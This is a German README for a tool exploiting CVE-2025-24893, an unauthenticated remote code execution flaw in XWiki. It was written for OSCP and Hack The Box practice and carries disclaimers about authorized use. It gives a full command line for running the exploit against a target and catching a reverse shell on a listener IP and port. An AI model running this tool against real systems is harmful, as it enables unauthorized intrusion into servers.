
OSCP like CVE-2025-24893 exploit for Linux XWiki
XWiki Platform ist eine generische Wiki-Plattform, die Laufzeitdienste für darauf aufbauende Anwendungen bereitstellt. Aufgrund einer Schwachstelle im SolrSearch-Endpunkt kann ein nicht authentifizierter Benutzer eine beliebige Remote-Codeausführung erreichen. Diese Schwachstelle beeinträchtigt die Vertraulichkeit, Integrität und Verfügbarkeit der gesamten XWiki-Installation.
CVE: CVE-2025-24893
Eine Demonstration des Exploits ist unten dargestellt:

Um diesen Exploit zu verwenden, befolgen Sie diese Schritte:
git clone https://github.com/yourusername/CVE-2025-24893.gitcd CVE-2025-24893pip install requests./CVE-2025-24893_linux-xwiki-exploit.py -t http(s)://[target]:(port) -l [Listener IP] -p [Listener PORT] [-hp [Local HTTP PORT]]
Dieser Exploit demonstriert die in CVE-2025-24893 beschriebene Remote-Codeausführungsschwachstelle und ermöglicht es einem nicht authentifizierten Benutzer, eine Reverse-Shell auf verwundbaren Linux-basierten XWiki-Installationen zu erhalten.
Ich habe dieses Tool ursprünglich für den Einsatz in Trainingsumgebungen wie OSCP-Vorbereitungslabs und Hack The Box entwickelt, wo ich eine einfache und zuverlässige Möglichkeit zur Reproduktion der Schwachstelle haben wollte. Da kein vorhandenes Tool meinen Anforderungen entsprach, entschied ich mich, ein eigenes zu erstellen.
Obwohl CVE-2025-24893 in unterstützten XWiki-Versionen bereits seit Langem gepatcht ist, sollte dieser Exploit nur gegen Systeme eingesetzt werden, die Ihnen gehören oder für die Sie ausdrücklich berechtigt sind, Tests durchzuführen.
Der Autor übernimmt keine Verantwortung für Missbrauch dieser Software oder für Schäden, die aus ihrer Nutzung entstehen.
Dieses Tool ist ausschließlich für Bildungszwecke und autorisierte Sicherheitsüberprüfungen bestimmt.
Verwenden Sie es nur gegen Systeme, die Ihnen gehören oder für die Sie ausdrücklich berechtigt sind, Tests durchzuführen. Der Autor übernimmt keine Haftung für Missbrauch dieser Software oder für Schäden, die aus ihrer Nutzung entstehen.
Beiträge sind willkommen.
Wenn Sie auf Fehler stoßen, Verbesserungsvorschläge haben oder Unterstützung für zusätzliche Payloads, Plattformen oder Funktionen hinzufügen möchten, können Sie gerne ein Issue eröffnen oder einen Pull-Request einreichen.
Konstruktives Feedback, Testberichte und Codebeiträge sind sehr willkommen.